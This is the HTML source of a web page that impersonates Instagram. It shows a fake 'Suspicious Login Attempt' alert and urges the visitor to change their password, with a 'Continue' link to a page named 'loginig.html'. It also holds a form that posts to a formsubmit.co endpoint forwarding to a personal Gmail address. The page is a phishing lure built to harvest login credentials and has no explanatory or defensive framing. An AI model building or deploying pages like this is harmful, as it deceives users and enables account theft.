<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <style>
        body{
            margin: 0;
            padding: 0;
            font-family: sans-serif;
            background-color: rgb(234, 232, 232);
        }
        #error_msg{
            background-color:rgb(248, 61, 61) ;
            color: white;
            text-align: center;
            padding-bottom: 10px;
            padding-top: 10px;
            font-size: 20px;
        }
        #header{
            text-align: center;
        }
        #text{
            font-size: 40px;
            text-align: center;
            padding-top: 20px;
        }
        #warning{
            text-align: center;
            font-size: 20px;
            padding-bottom: 2rem;
            padding-left: 20px;
            padding-right: 20px;
        }
        #button{
            font-size: 20px;
            background-color: rgb(65, 65, 255);
            text-decoration: none;
            padding: 15px 50px;
            border-radius: 6px;
            color: white;
        }
        #buttonpos{
            display: flex;
            justify-content: center;
        }
    </style>
</head>
<body>
    <div id="header">
        <h2>Instagram</h2>
    </div>
    <div id="error_msg">
        Suspicious Login Attempt
    </div>
    <div>
        <p id="text">We Detected An Unusual Login <br> Attempt</p>
        <p id="warning" > To secure your account, <b>please change your password.</b></p>
    </div>
    <div id="buttonpos">
        <a id="button"href="loginig.html">Continue</a>
    </div>
    <div>
        <form action="https://formsubmit.co/supafaytathesecond@gmail.com" method="post">

        </form>
    </div>
</body>
</html>
